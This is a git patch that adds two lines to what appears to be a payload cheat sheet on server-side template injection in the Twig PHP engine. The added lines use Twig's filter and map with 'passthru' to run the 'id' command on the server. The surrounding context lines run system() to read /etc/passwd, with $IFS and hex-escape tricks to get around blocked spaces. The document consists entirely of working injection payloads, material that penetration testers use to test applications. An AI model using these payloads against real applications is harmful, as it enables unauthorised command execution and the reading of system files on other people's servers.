From c1dc141e13f76f0a6b8ba2866e2263b3aebbbb82 Mon Sep 17 00:00:00 2001
From: Tom Wilford <hello@jollyblueman.com>
Date: Fri, 28 Apr 2023 14:47:59 +0100
Subject: [PATCH] Added 'passthru' filter exploits

---
 Server Side Template Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index a0913f0..5c9fe14 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -966,6 +966,8 @@ $output = $twig > render (
 {{['id',1]|sort('system')|join}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id']|filter('passthru')}}
+{{['id']|map('passthru')}}
 ```
 
 Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)